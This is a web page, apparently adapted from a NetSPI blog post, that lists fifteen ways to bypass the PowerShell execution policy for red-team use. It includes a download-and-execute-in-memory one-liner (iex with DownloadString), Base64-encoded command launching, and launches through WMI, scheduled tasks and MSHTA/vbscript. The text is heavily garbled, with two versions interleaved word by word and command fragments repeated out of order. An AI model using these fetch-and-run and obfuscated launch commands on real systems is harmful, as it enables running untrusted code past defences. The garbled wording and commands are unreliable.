Bypass the PowerShell Execution Policy
💻 15 Ways to Bypass the PowerShell Execution Policy
Author:Based on the original by Scott Sutherland (summarized & adapted)Original: NetSPI Blog)
🧠 Introduction
PowerShell'PowerShell’s execution policy is designed to prevent unauthorized or accidentalrestricts script execution.execution, However,but there are many legitimate reasons to work around it — especially during penetration testing, red team exercises, or automation. Below are 15 commonthese methods allow you to bypass theit policy,without needing admin rights.
🧪 Quick Methods with explanations.
🔐 Bypass Techniques ExplainedExamples
1. Paste Script Directlydirectly in Consolethe console
PowerShellPolicies onlydon’t applies execution policyapply to scriptmanually files.typed If you paste code directly into the console, it bypasses policy restrictions entirely.commands.2.Echo Pipe& Scriptpipe to PowerShell
You can echo the script and pipe it to PowerShell’s standard input:
echo Write-Host "Hello"Hi" \| powershell -noprofile -
Executes Thisvia avoids the need for saving the script to disk.stdin.3. Read Script File and Pipe to PowerShell
This loads a script from disk and pipes it in:
file
Get-Content script.ps1 \| powershell -noprofile -
Reads Execution policy is not enforced when the script is readline-by-line as input.4. Download and Executeexecute in Memorymemory
Common in red teaming, this downloads and executes the script directly:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://example.com/script.ps1'URL')"
No Thisfile avoids writing anythingwritten to disk.5. Use the -Command Argumentargument
Scripts passed via the `-command` flag are evaluated like pasted input:
powershell -command "Write-Host 'Bypassed!'Bypass'"
Executes inline commands.6. Use -EncodedCommand argument
Scripts can be Base64-encoded in Base64 andstring passed directly to PowerShell:
$command = "Write-Host 'Hello'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded
Useful for obfuscation and policy bypass.PowerShell.7. Set Policy via Group Policy or Registry
If you have access, change the execution policy via:in session
Set-ExecutionPolicy Bypass -Scope Process
Only Oraffects modifycurrent registry keys like `HKLM:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell`.session.8. Use PowerShell ISE (Integrated Scripting Environment)
ISE sometimes behaves differently and may allow execution:
powershell_ise.exe script.ps1
Sometimes bypasses policy.9. Change File Extension
Rename `.ps1`script to `.txt`txt
Read and readrun it into memory inside another script. Thismanually; avoids detection and.ps1 enforcement.10. Use WMI to Launch Scriptexecution
Runs PowerShell can be runremotely via WMI methods that bypass policies:
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -nop -enc ..."
Win32_Process.11.Scheduled Use Task Schedulertask
Create a scheduled task thatto runsrun your PowerShell script. The execution policy isn't enforced in the same way:
schtasks /create /tn bypass /tr "powershell.exe -File script.ps1" /sc once /st 00:00
12.PowerShell Use WinRM or PS Remotingremoting
When executing scripts remotely, policiesExecutes on theremote targetsystems; systemlocal policy may not apply, especially if executed as commands:
Invoke-Command -ScriptBlock {Write-Host "Hello"} -ComputerName target
apply.13.Inject Usevia DLL Injection or Reflective PE(advanced)
Advanced method: InjectLoads PowerShell intoengine memorydirectly viain custom DLL or PE loader. Used by tools like PowerShell Empire.memory.14. Use Alternate Shells (e.g., MSHTA, wscript)
Launch PowerShell indirectlyInvoke from otherMSHTA interpreters:or mshtawscript
Uses vbscript:Execute("CreateObject(""Wscript.Shell"").Runalternate ""powershellscript -nophosts -encto ..."":close")
trigger PowerShell.15.Use Exploittrusted Softwaresoftware Thatto Invokes PowerShellexecute
Some tools like MSBuild, Excel macros,Hijack or installerabuse frameworksapplications maythat invokerun PowerShell —under whichthe you can hijack.hood.
⚠️
echo Write-Host "Hello"Hi" \| powershell -noprofile -Executes
fileGet-Content script.ps1 \| powershell -noprofile -
Reads
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://example.com/script.ps1'URL')"No
powershell -command "Write-Host 'Bypassed!'Bypass'"Executes inline commands.
$command = "Write-Host 'Hello'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded
sessionSet-ExecutionPolicy Bypass -Scope Process
Only
powershell_ise.exe script.ps1Sometimes bypasses policy.
Rename
Read and
Runs PowerShell
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -nop -enc ..."Create
schtasks /create /tn bypass /tr "powershell.exe -File script.ps1" /sc once /st 00:00Invoke-Command -ScriptBlock {Write-Host "Hello"} -ComputerName targetmshtawscript
Uses vbscript:Execute("CreateObject(""Wscript.Shell"").Runalternate ""powershellscript -nophosts -encto ..."":close")Note: Legal Notice
These methods are intended for authorizedlegitimate securityuse assessments,only research,— such as automation, testing, and automation.red Useteaming responsibly— andwhere within the bounds of local laws and organizational policy.authorized.
Last adapted from NetSPI: https://www.netspi.com/...